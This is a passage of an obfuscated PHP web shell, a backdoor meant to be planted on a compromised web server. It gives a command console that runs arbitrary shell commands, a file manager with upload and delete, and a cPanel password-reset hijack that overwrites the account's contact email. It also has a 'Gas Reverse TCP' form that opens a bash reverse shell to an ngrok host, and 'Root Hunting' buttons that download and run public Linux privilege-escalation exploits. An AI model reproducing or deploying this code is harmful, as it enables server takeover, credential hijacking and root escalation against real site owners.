<tr>\xa<td><form onsubmit="".(function_exists("actionFilesMan")?"g(null,this.c.value,'');":'')."return false;"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='".htmlspecialchars($GLOBALS["cwd"])."'><input type=submit value='submit'></form></td>
<td><form onsubmit="".(function_exists("actionFilesTools")?"g('FilesTools',null,this.f.value);":'')."return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>\xa</tr><tr>
<td><form onsubmit="".(function_exists("actionFilesMan")?"g('FilesMan',null,'mkdir',this.d.value);":'')."return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
<td><form onsubmit="".(function_exists("actionFilesTools")?"g('FilesTools',null,this.f.value,'mkfile');":'')."return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>\xa</tr><tr>
<td><form onsubmit="".(function_exists("actionConsole")?"g('Console',null,this.c.value);":'')."return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>\xa<td><form method='post' ".(!function_exists("actionFilesMan")?" onsubmit="return false;" ":'')."ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMan'>\xa<input type=hidden name=c value='".htmlspecialchars($GLOBALS["cwd"])."'>\xa<input type=hidden name=p1 value='uploadFile'>\xa<input type=hidden name=ne value=''>
<input type=hidden name=charset value='".(isset($_POST["charset"])?$_POST["charset"]:'')."'>
<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='submit'></form><br  ></td>
</tr></table></div>
</body>\xa</html>";}goto Nr1jN;c9t3R:ini_set("log_errors_max_len",0);goto T_JGw;Ulmtn:function perms($p){if(($p&49152)==49152){$i="s";}elseif(($p&40960)==40960){$i="l";}elseif(($p&32768)==32768){$i="-";}elseif(($p&24576)==24576){$i="b";}elseif(($p&16384)==16384){$i="d";}elseif(($p&8192)==8192){$i="c";}elseif(($p&4096)==4096){$i="p";}else{$i="u";}$i.=$p&256?"r":"-";$i.=$p&128?"w":"-";$i.=$p&64?$p&2048?"s":"x":($p&2048?"S":"-");$i.=$p&32?"r":"-";$i.=$p&16?"w":"-";$i.=$p&8?$p&1024?"s":"x":($p&1024?"S":"-");$i.=$p&4?"r":"-";$i.=$p&2?"w":"-";$i.=$p&1?$p&512?"t":"x":($p&512?"T":"-");return $i;}goto M1Qpe;aeTs4:function actionConsole(){if(!empty($_POST["p1"])&&!empty($_POST["p2"])){prototype(sha1(md5($_SERVER["HTTP_HOST"]))."stderr_to_out",true);$_POST["p1"].=" 2>&1";}elseif(!empty($_POST["p1"])){prototype(sha1(md5($_SERVER["HTTP_HOST"]))."stderr_to_out",0);}if(isset($_POST["ajax"])){prototype(sha1(md5($_SERVER["HTTP_HOST"]))."ajax",true);ob_start();echo "d.cf.cmd.value='';\xa";$temp=@iconv($_POST["charset"],"UTF-8",addcslashes("
$ ".$_POST["p1"]."\xa".ex($_POST["p1"]),"
\xd\x9\'\0"));if(preg_match("!.*cd\s+([^;]+)$!",$_POST["p1"],$match)){if(@chdir($match[1])){$GLOBALS["cwd"]=@getcwd();echo "c_='".$GLOBALS["cwd"]."';";}}echo "d.cf.output.value+='".$temp."';";echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";$temp=ob_get_clean();echo strlen($temp),"
",$temp;die;}if(empty($_POST["ajax"])&&!empty($_POST["p1"])){prototype(sha1(md5($_SERVER["HTTP_HOST"]))."ajax",0);}hardHeader();echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);\xavar cmds = new Array('');\xavar cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;\xaif(cur>=0)\xadocument.cf.cmd.value = cmds[cur];\xaelse
cur++;\xa} else if(n == 40) {
cur++;\xaif(cur < cmds.length)\xadocument.cf.cmd.value = cmds[cur];\xaelse\xacur--;\xa}\xa}
function add(cmd) {
cmds.pop();\xacmds.push(cmd);\xacmds.push('');\xacur = cmds.length-1;
}\xa</script>";echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><label><select name=alias>";foreach($GLOBALS["aliases"]as $n=>$v){if($v==''){echo "<optgroup label="-".htmlspecialchars($n)."-"></optgroup>";continue;}echo "<option value="".htmlspecialchars($v)."">".$n."</option>";}echo "</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 ".(@$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."ajax"]?"checked":'')."> send using AJAX <input type=checkbox name=show_errors value=1 ".(!empty($_POST["p2"])||$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."stderr_to_out"]?"checked":'')."> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>";if(!empty($_POST["p1"])){echo htmlspecialchars("$ ".$_POST["p1"]."
".ex($_POST["p1"]));}echo "</textarea><table style="border:1px solid #000000;background-color:#000000;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>";echo "</form></div><script>d.cf.cmd.focus();</script>";hardFooter();}goto WKUxM;Akhyp:function actionCpanel(){hardHeader();echo "<center><h1>Reset Cpanel</h1><div class=content><br>";echo "<a href="?cpanelchanger" target="_blank"><input class="custom-tools-buttons" type="submit" value="Reset"></a>";hardFooter();}goto w82DR;ExF9C:if(!isset($_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."ajax"])){$_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."ajax"]=(bool) $asciifnc1;}goto zA5El;TuU0I:if($os=="win"){$home_cwd=str_replace("\","/",$home_cwd);$cwd=str_replace("\","/",$cwd);}goto jAXHO;J5SK5:if(strtolower(substr(PHP_OS,0,3))=="win"){$os="win";}else{$os="nix";}goto sHJzm;abTW4:function actionLogout(){exec("rm -rf priv_sym priv_cgi adminer.php priv_sympy");setcookie(sha1(md5($_SERVER["HTTP_HOST"])),'',time()-3600);die("<style>\xabody {background-color:#000000;  } </style></br></br><body><pre align=center><form method=post style='color:#ffffff;text-align: center;'>bye bye<br><br></form> </body>");}goto f6EVW;gA0nc:function actiondisable(){hardHeader();echo "<center><h1>Bypass: Disabled Functions</h1><div class=content><br>";echo "<br><center>  <iframe frameBorder=0 src='?disabled' width='900' height='300'></iframe></a>";echo "</div>";hardFooter();}goto Akhyp;Nr1jN:if(!function_exists("posix_getpwuid")&&strpos($GLOBALS["disable_functions"],"posix_getpwuid")===false){function posix_getpwuid($p){return false;}}goto Of1wl;VVA1v:$asciifnc1=true;goto AXSyi;QouUw:ini_set("display_startup_errors",0);goto OilAS;f6EVW:function actionSelfRemove(){if($_POST["p1"]=="yes"){if(@unlink(preg_replace("!\(\d+\)\s.*!",'',__FILE__))){die("Shell has been removed");}else{echo "unlink error!";}}if($_POST["p1"]!="yes"){hardHeader();}echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>";hardFooter();}goto hflHy;wVm3J:function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr='';$enc_str='';$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str)){break;}}}return base64_decode($enc_str);}goto uVFz3;OilAS:ini_set("max_execution_time",0);goto qq4r6;TJJYv:if(empty($_POST["charset"])){$_POST["charset"]=$asciifnc2;}goto wgCev;w82DR:if(isset($_GET["cpanelchanger"])){echo "<center><h1>Reset Cpanel</h1><div class=content><br>";echo "<form method="post" target="_blank">
<input type="email" name="cpanelemail" placeholder="[email protected]" value="[email protected]">\xa<input type="submit" name="cpanelchange" value="Reset Cpanel">
</form><br><br>";$IIIIIIIIIIII=get_current_user();$IIIIIIIIIII1=$_SERVER["HTTP_HOST"];$IIIIIIIIIIlI=getenv("REMOTE_ADDR");if(isset($_POST["cpanelchange"])){$email=$_POST["cpanelemail"];$IIIIIIIIIIl1="email:".$email;$IIIIIIIIII1I=fopen("/home/".$IIIIIIIIIIII."/.cpanel/contactinfo","w");fwrite($IIIIIIIIII1I,$IIIIIIIIIIl1);fclose($IIIIIIIIII1I);$IIIIIIIIII1I=fopen("/home/".$IIIIIIIIIIII."/.contactinfo","w");fwrite($IIIIIIIIII1I,$IIIIIIIIIIl1);fclose($IIIIIIIIII1I);$IIIIIIIIIlIl="https://";$IIIIIIIIIlI1="2083";$IIIIIIIIIllI=$IIIIIIIIIII1.":2083/resetpass#".$IIIIIIIIIIII.'';echo "<center>Info Detail: </center>";echo "<center><input type="text" value="".$IIIIIIIIIlIl.''.$IIIIIIIIIII1.":".$IIIIIIIIIlI1."|".$IIIIIIIIIIII."|" id="cp"><button onclick="cpfull()">Copy text</button></center>
<script>function cpfull() {\xavar copyText = document.getElementById("cp");
copyText.select();\xadocument.execCommand("copy");\xaalert("Copied!");\xa}</script>\xa";echo "<br/><center>User:<br/><input type="text" value="".$IIIIIIIIIIII."" id="user">
<button onclick="username()">Copy text</button></center>\xa<script>function username() {\xavar copyText = document.getElementById("user");\xacopyText.select();\xadocument.execCommand("copy");\xaalert("Copied!");\xa}</script>";echo "<br/><center><a target="_blank" href="".$IIIIIIIIIlIl.''.$IIIIIIIIIllI."">RESET</a></center>";}die;}goto KQnLx;dMy2L:ini_set("error_log",null);goto mPK0W;nVw6c:$asciifnc3="FilesMan";goto gn4fB;yV96F:function prototype($k,$v){$_COOKIE[$k]=$v;setcookie($k,$v);}goto sww2V;Y4Cln:if(isset($_REQUEST["reversephp"])){echo "<style>body{background-color:#060a10;color:#e1e1e1;margin:0;font:normal 75% Arial,Helvetica,sans-serif}canvas{display:block;vertical-align:bottom}#particles-js{width:100%;height:100px;background-color:#060a10;background-image:url("");background-repeat:no-repeat;background-size:cover;background-position:50% 50%}body,td,th{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top}table.info{color:#c3c3c3}table#toolsTbl{background-color:#060a10}a,h1,span{color:#fff!important}span{font-weight:bolder}h1{border-left:5px solid #9c982e;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0}div.content{padding:5px;margin-left:5px;background-color:#060a10}a{text-decoration:none}a:hover{text-decoration:underline;color:#ffdb5f!important}.tooltip::after{background:#0663d5;color:#fff;content:attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden}.tooltip:hover::after{opacity:1;visibility:visible}.ml1{border:1px solid #202832;padding:5px;margin:0;overflow:auto}.bigarea{min-width:100%;max-width:100%;height:400px}.small{min-width:100%;max-width:100%;height:100px}input,select,textarea{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:0}label{position:relative}label:after{content:"<>";font:10px Consolas,monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px;top:3px;padding:0;position:absolute;pointer-events:none}label:before{content:"";right:0;top:0;width:17px;height:17px;background:#202832;position:absolute;pointer-events:none;display:block}form{margin:0}#toolsTbl{text-align:center}#fak{background:0 0}#fak td{padding:5px 0 0 0}iframe{border:1px solid #060a10}.toolsInp{width:300px}.main th{text-align:left;background-color:#060a10}.main tr:hover{background-color:#354252}.main td,th{vertical-align:middle}input[type=submit]{background-color:#9c982e}input[type=button]{background-color:#9c982e}input[type=submit]:hover{background-color:#ffdb5f}input[type=button]:hover{background-color:#ffdb5f}.l1{background-color:#202832}pre{font:9pt Courier New}input[type=submit].custom-tools-buttons{font-size:14px!important;padding:5px 10px!important;margin:0 5px!important;font-weight:700!important;cursor:pointer!important;color:#e1e1e1!important;background-color:#060a10!important;border:1px solid #9c982e!important}input[type=submit].custom-tools-buttons:hover{background-color:#9c982e!important}</style>";echo "<div style="margin:30px 20px;">";echo "<form method="post">";echo "<table style=background:#212832!important; class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>";echo "<thead><center><h3><strong>Gas Reverse TCP</strong></h3></center></thead>";echo "<tbody>";echo "<tr><td>";echo "<input class="custom-tools-buttons" type="text" name="ngrokip" placeholder="2.tcp.ngrok.io">";echo "<input class="custom-tools-buttons" type="text" name="ngrokport" placeholder="16591">";echo "<input class="custom-tools-buttons" type="submit" name="gasreverse" value="Reverse TCP">";echo "</tr></td>";echo "</tbody>";echo "</table>";echo "</form>";echo "<div style="margin:30px 20px;">";if(isset($_POST["gasreverse"])){set_time_limit(0);$result_reversetcp='';$VERSION="1.0";$ip=$_POST["ngrokip"];$port=$_POST["ngrokport"];$phpreverse="/bin/bash -c 'bash -i >& /dev/tcp/".$ip."/{$port} 0>&1'";$result_reversetcp.="<pre class=ml1>{$asciifnc7}".ex($phpreverse)."</pre><br>";echo "<div class="smallarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($result_reversetcp).PHP_EOL;echo "</div>";}echo "</div>";echo "</div>";die;}goto WwD7E;biG74:ini_set("display_startup_errors",0);goto bHwz9;ei2I9:if(isset($_POST["c"])){@chdir($_POST["c"]);}goto wRb2p;bHwz9:ini_set("max_execution_time",0);goto ssGFZ;QAY2s:if(isset($_REQUEST["autor"])){echo "<style>body{background-color:#060a10;color:#e1e1e1;margin:0;font:normal 75% Arial,Helvetica,sans-serif}canvas{display:block;vertical-align:bottom}#particles-js{width:100%;height:100px;background-color:#060a10;background-image:url("");background-repeat:no-repeat;background-size:cover;background-position:50% 50%}body,td,th{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top}table.info{color:#c3c3c3}table#toolsTbl{background-color:#060a10}a,h1,span{color:#fff!important}span{font-weight:bolder}h1{border-left:5px solid #9c982e;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0}div.content{padding:5px;margin-left:5px;background-color:#060a10}a{text-decoration:none}a:hover{text-decoration:underline;color:#ffdb5f!important}.tooltip::after{background:#0663d5;color:#fff;content:attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden}.tooltip:hover::after{opacity:1;visibility:visible}.ml1{border:1px solid #202832;padding:5px;margin:0;overflow:auto}.bigarea{min-width:100%;max-width:100%;height:400px}.small{min-width:100%;max-width:100%;height:100px}input,select,textarea{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:0}label{position:relative}label:after{content:"<>";font:10px Consolas,monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px;top:3px;padding:0;position:absolute;pointer-events:none}label:before{content:"";right:0;top:0;width:17px;height:17px;background:#202832;position:absolute;pointer-events:none;display:block}form{margin:0}#toolsTbl{text-align:center}#fak{background:0 0}#fak td{padding:5px 0 0 0}iframe{border:1px solid #060a10}.toolsInp{width:300px}.main th{text-align:left;background-color:#060a10}.main tr:hover{background-color:#354252}.main td,th{vertical-align:middle}input[type=submit]{background-color:#9c982e}input[type=button]{background-color:#9c982e}input[type=submit]:hover{background-color:#ffdb5f}input[type=button]:hover{background-color:#ffdb5f}.l1{background-color:#202832}pre{font:9pt Courier New}input[type=submit].custom-tools-buttons{font-size:14px!important;padding:5px 10px!important;margin:0 5px!important;font-weight:700!important;cursor:pointer!important;color:#e1e1e1!important;background-color:#060a10!important;border:1px solid #9c982e!important}input[type=submit].custom-tools-buttons:hover{background-color:#9c982e!important}</style>";echo "<div style="margin:30px 20px;">";echo "<form method="post">";echo "<table style=background:#212832!important; class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>";echo "<thead><center><h3><strong>Root Hunting</strong></h3></center></thead>";echo "<tbody>";echo "<tr><td>";echo "<input class="custom-tools-buttons" type="submit" name="checkmodule" value="Modules">";echo "<input class="custom-tools-buttons" type="submit" name="autoroot4034c" value="4034.c">";echo "<input class="custom-tools-buttons" type="submit" name="autoroot4034py" value="4034.py">";echo "<input class="custom-tools-buttons" type="submit" name="autoroot3156py" value="3156.py">";echo "<input class="custom-tools-buttons" type="submit" name="autorootexploitc" value="exploit.c">";echo "<input class="custom-tools-buttons" type="submit" name="clearrooting" value="Clear">";echo "</tr></td>";echo "</tbody>";echo "</table>";echo "</form>";echo "<div style="margin:30px 20px;">";if(isset($_POST["checkmodule"])){$makev="make --version";$gccv="gcc --version";$pythonv="python --version";$checkmodule_result.="<pre class=ml1>{$asciifnc7}".ex($makev)."<br>Untuk Make Version</pre><br>";$checkmodule_result.="<pre class=ml1>{$asciifnc7}".ex($gccv)."<br>Untuk GCC Version</pre><br>";$checkmodule_result.="<pre class=ml1>{$asciifnc7}".ex($pythonv)."<br>Untuk Python Version</pre><br>";echo "<div class="smallarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($checkmodule_result).PHP_EOL;echo "</div>";}if(isset($_POST["autoroot4034c"])){$result_autoroot4034c="<pre class=ml1>{$asciifnc7}".ex("cd /tmp && eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"")."</pre>";echo "<div class="smallarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($result_autoroot4034c).PHP_EOL;echo "</div>";}if(isset($_POST["autoroot4034py"])){$result_autoroot4034py="<pre class=ml1>{$asciifnc7}".ex("cd /tmp && wget -O as.py https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py && python as.py")."</pre>";echo "<div class="smallarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($result_autoroot4034py).PHP_EOL;echo "</div>";}if(isset($_POST["autoroot3156py"])){$result_autoroot3156py="<pre class=ml1>{$asciifnc7}".ex("cd /tmp && wget -O asw.py https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_userspec.py && python asw.py")."</pre>";echo "<div class="smallarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($result_autoroot3156py).PHP_EOL;echo "</div>";}if(isset($_POST["autorootexploitc"])){$result_autorootexploitc="<pre class=ml1>{$asciifnc7}".ex("cd /tmp && wget -O exploit.c https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c && gcc -m32 -static -o exploit exploit.c && chmod +x exploit &&./exploit")."</pre>";echo "<div class="smallarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($result_autorootexploitc).PHP_EOL;echo "</div>";}if(isset($_POST["clearrooting"])){$result_clearrooting="<pre class=ml1>{$asciifnc7}".ex("cd /tmp && rm -rf as.py asw.py exploit.c exploit Makefile cve-2021-4034.c cve-2021-4034.sh pwnkit.c cve-2021-4034 GCONV_PATH=. pwnkit.so pwnkit gconv-modules payload.so")."</pre><br>".PHP_EOL;$tmp=sys_get_temp_dir();if(!file_exists($tmp."/as.py")){$result_clearrooting.="Berhasil!";}if(!file_exists($tmp."/asw.py")&&!file_exists($tmp."/payload.so")){$result_clearrooting.="Berhasil!";}if(!file_exists($tmp."/exploit.c")&&!file_exists($tmp."/exploit")){$result_clearrooting.="Berhasil!";}if(!file_exists($tmp."/Makefile")&&!file_exists($tmp."/cve-2021-4034.c")&&!file_exists($tmp."/cve-2021-4034.sh")&&!file_exists($tmp."/pwnkit.c")&&!file_exists($tmp."/cve-2021-4034")&&!file_exists($tmp."/pwnkit.so")&&!file_exists($tmp."/pwnkit")&&!is_dir($tmp."/gconv-modules")&&!is_dir($tmp."/GCONV_PATH=.")){$result_clearrooting.="Berhasil!";}echo "<div class="smallarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($result_clearrooting).PHP_EOL;echo "</div>";}echo "</div>";echo "</div>";die;}goto gXAzU;jJ2Wl:$keyxx=$_SESSION["keyxx"];goto VVA1v;qq4r6:if(version_compare(PHP_VERSION,"5.3.0","<")){set_magic_quotes_runtime(0);}goto ZktEK;ZiHyv:$disable_functions=@ini_get("disable_functions");goto xW3PA;KQnLx:function actionFilesMan(){if(!empty($_COOKIE["f"])){$_COOKIE["f"]=@unserialize($_COOKIE["f"]);}if(!empty($_POST["p1"])){switch($_POST["p1"]){case "uploadFile":if(is_array($_FILES["f"]["tmp_name"])){foreach($_FILES["f"]["tmp_name"]as $i=>$tmpName){if(!@move_uploaded_file($tmpName,$_FILES["f"]["name"][$i])){echo "Can't upload file!";}}}break;case "mkdir":if(!@mkdir($_POST["p2"])){echo "Can't create new dir";}break;case "delete":function deleteDir($path){$path=substr($path,-1)=="/"?$path:$path."/";$dh=opendir($path);while(($asciifnc6=readdir($dh))!==false){$asciifnc6=$path.$asciifnc6;if(basename($asciifnc6)==".."||basename($asciifnc6)=="."){continue;}$type=filetype($asciifnc6);if($type=="dir"){deleteDir($asciifnc6);}else{@unlink($asciifnc6);}}closedir($dh);@rmdir($path);}if(is_array(@$_POST["f"])){foreach($_POST["f"]as $f){if($f==".."){continue;}$f=urldecode($f);if(is_dir($f)){deleteDir($f);}else{@unlink($f);}}}break;case "paste":if($_COOKIE["act"]=="copy"){function copy_paste($c,$s,$d){if(is_dir($c.$s)){mkdir($d.$s);$h=@opendir($c.$s);while(($f=@readdir($h))!==false){if($f!="."and $f!=".."){copy_paste($c.$s."/",$f,$d.$s."/");}}}elseif(is_file($c.$s)){@copy($c.$s,$d.$s);}}foreach($_COOKIE["f"]as $f){copy_paste($_COOKIE["c"],$f,$GLOBALS["cwd"]);}}elseif($_COOKIE["act"]=="move"){function move_paste($c,$s,$d){if(is_dir($c.$s)){mkdir($d.$s);$h=@opendir($c.$s);while(($f=@readdir($h))!==false){if($f!="."and $f!=".."){copy_paste($c.$s."/",$f,$d.$s."/");}}}elseif(@is_file($c.$s)){@copy($c.$s,$d.$s);}}foreach($_COOKIE["f"]as $f){@rename($_COOKIE["c"].$f,$GLOBALS["cwd"].$f);}}elseif($_COOKIE["act"]=="zip"){if(class_exists("ZipArchive")){$zip=new ZipArchive();if($zip->open($_POST["p2"],1)){chdir($_COOKIE["c"]);foreach($_COOKIE["f"]as $f){if($f==".."){continue;}if(@is_file($_COOKIE["c"].$f)){$zip->addFile($_COOKIE["c"].$f,$f);}elseif(@is_dir($_COOKIE["c"].$f)){$iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f."/",FilesystemIterator::SKIP_DOTS));foreach($iterator as $key=>$value){$zip->addFile(realpath($key),$key);}}}chdir($GLOBALS["cwd"]);$zip->close();}}}elseif($_COOKIE["act"]=="unzip"){if(class_exists("ZipArchive")){$zip=new ZipArchive();foreach($_COOKIE["f"]as $f){if($zip->open($_COOKIE["c"].$f)){$zip->extractTo($GLOBALS["cwd"]);$zip->close();}}}}elseif($_COOKIE["act"]=="tar"){chdir($_COOKIE["c"]);$_COOKIE["f"]=array_map("escapeshellarg",$_COOKIE["f"]);ex("tar cfzv ".escapeshellarg($_POST["p2"])." ".implode(" ",$_COOKIE["f"]));chdir($GLOBALS["cwd"]);}unset($_COOKIE["f"]);setcookie("f",'',time()-3600);break;default:if(!empty($_POST["p1"])){prototype("act",$_POST["p1"]);prototype("f",serialize(@$_POST["f"]));prototype("c",@$_POST["c"]);}break;}}hardHeader();echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>";$dirContent=hardScandir(isset($_POST["c"])?$_POST["c"]:$GLOBALS["cwd"]);if($dirContent===false){echo "Can't open this folder!";hardFooter();return;}global $sort;$sort=array("name",1);if(!empty($_POST["p1"])){if(preg_match("!s_([A-z]+)_(\d{1})!",$_POST["p1"],$match)){$sort=array($match[1],(int) $match[2]);}}echo "<script>
function sa() {
for(i=0;i<d.files.elements.length;i++)\xaif(d.files.elements[i].type == 'checkbox')\xad.files.elements[i].checked = d.files.elements[0].checked;
}
</script>\xa<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_".($sort[1]?0:1)."")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_".($sort[1]?0:1)."")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_".($sort[1]?0:1)."")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_".($sort[1]?0:1)."")'>Permissions</a></th><th>Actions</th></tr>";$dirs=$files=array();$n=count($dirContent);for($i=0;$i<$n;$i++){$ow=@posix_getpwuid(@fileowner($dirContent[$i]));$gr=@posix_getgrgid(@filegroup($dirContent[$i]));$tmp=array("name"=>$dirContent[$i],"path"=>$GLOBALS["cwd"].$dirContent[$i],"modify"=>date("Y-m-d H:i:s",@filemtime($GLOBALS["cwd"].$dirContent[$i])),"perms"=>viewPermsColor($GLOBALS["cwd"].$dirContent[$i]),"size"=>@filesize($GLOBALS["cwd"].$dirContent[$i]),"owner"=>$ow["name"]?$ow["name"]:@fileowner($dirContent[$i]),"group"=>$gr["name"]?$gr["name"]:@filegroup($dirContent[$i]));if(@is_file($GLOBALS["cwd"].$dirContent[$i])){$files[]=array_merge($tmp,array("type"=>"file"));}elseif(@is_link($GLOBALS["cwd"].$dirContent[$i])){$dirs[]=array_merge($tmp,array("type"=>"link","link"=>readlink($tmp["path"])));}elseif(@is_dir($GLOBALS["cwd"].$dirContent[$i])&&$dirContent[$i]!="."){$dirs[]=array_merge($tmp,array("type"=>"dir"));}}$GLOBALS["sort"]=$sort;function cmp($a,$b){if($GLOBALS["sort"][0]!="size"){return strcmp(strtolower($a[$GLOBALS["sort"][0]]),strtolower($b[$GLOBALS["sort"][0]]))*($GLOBALS["sort"][1]?1:-1);}else{return($a["size"]<$b["size"]?-1:1)*($GLOBALS["sort"][1]?1:-1);}}usort($files,"cmp");usort($dirs,"cmp");$files=array_merge($dirs,$files);$l=0;foreach($files as $f){echo "<tr".($l?" class=l1":'')."><td><input type=checkbox name="f[]" value="".urlencode($f["name"])."" class=chkbx></td><td><a href=# onclick="".($f["type"]=="file"?"g('FilesTools',null,'".urlencode($f["name"])."', 'view')">".htmlspecialchars($f["name"]):"g('FilesMan','".$f["path"]."');" ".(empty($f["link"])?'':"title='{$f["link"]}'")."><b>[ ".htmlspecialchars($f["name"])." ]</b>")."</a></td><td>".($f["type"]=="file"?viewSize($f["size"]):$f["type"])."</td><td>".$f["modify"]."</td><td>".$f["owner"]."/".$f["group"]."</td><td><a href=# onclick="g('FilesTools',null,'".urlencode($f["name"])."','chmod')">".$f["perms"]."</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g('FilesTools',null,'".urlencode($f["name"])."', 'rename')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g('FilesTools',null,'".urlencode($f["name"])."', 'touch')">T</a>".($f["type"]=="file"?" <a class="tooltip" data-tooltip="Frame" href="#" onclick="g('FilesTools',null,'".urlencode($f["name"])."', 'frame')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g('FilesTools',null,'".urlencode($f["name"])."', 'edit')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g('FilesTools',null,'".urlencode($f["name"])."', 'download')">D</a>":'')."</td></tr>";$l=$l?0:1;}echo "<tr id=fak><td colspan=7>\xa<input type=hidden name=ne value=''>\xa<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='".htmlspecialchars($GLOBALS["cwd"])."'>
<input type=hidden name=charset value='".(isset($_POST["charset"])?$_POST["charset"]:'')."'>\xa<label><select name='p1'>";if(!empty($_COOKIE["act"])&&@count($_COOKIE["f"])){echo "<option value='paste'>\342\x86\263 Paste</option>";}echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";if(class_exists("ZipArchive")){echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>";}echo "<option value='tar'>+ tar.gz</option>";echo "</select></label>";if(!empty($_COOKIE["act"])&&@count($_COOKIE["f"])&&($_COOKIE["act"]=="zip"||$_COOKIE["act"]=="tar")){echo "&nbsp;file name: <input type=text name=p2 value='hard_".date("Ymd_His").".".($_COOKIE["act"]=="zip"?"zip":"tar.gz")."'>&nbsp;";}echo "<input type='submit' value='submit'></td></tr></form></table></div>";hardFooter();}goto zPNwz;f_t7R:ini_set("display_errors",0);goto biG74;W8DS5:function ex($in){$asciifnc7='';if(function_exists("exec")){@exec($in,$asciifnc7);$asciifnc7=@join("\xa",$asciifnc7);}elseif(function_exists("passthru")){ob_start();@passthru($in);$asciifnc7=ob_get_clean();}elseif(function_exists("system")){ob_start();@system($in);$asciifnc7=ob_get_clean();}elseif(function_exists("shell_exec")){$asciifnc7=shell_exec($in);}elseif(is_resource($f=@popen($in,"r"))){$asciifnc7='';while(!@feof($f)){$asciifnc7.=fread($f,1024);}pclose($f);}else{return "\342\x86\xb3 Unable to execute command\xa";}return $asciifnc7==''?"\xe2\x86\263 Gak Bisa Execute Command!\xa":$asciifnc7;}goto rpdXp;xW3PA:$home_cwd=@getcwd();goto ei2I9;GoQMc:function which($p){$path=ex("which ".$p);if(!empty($path)){return $path;}return false;}goto bLZtb;CsYiQ:$asciifnc2="utf-8";goto nVw6c;Rw6YU:if($os=="win"){$aliases=array("List Directory"=>"dir","Find index.php in current dir"=>"dir /s /w /b 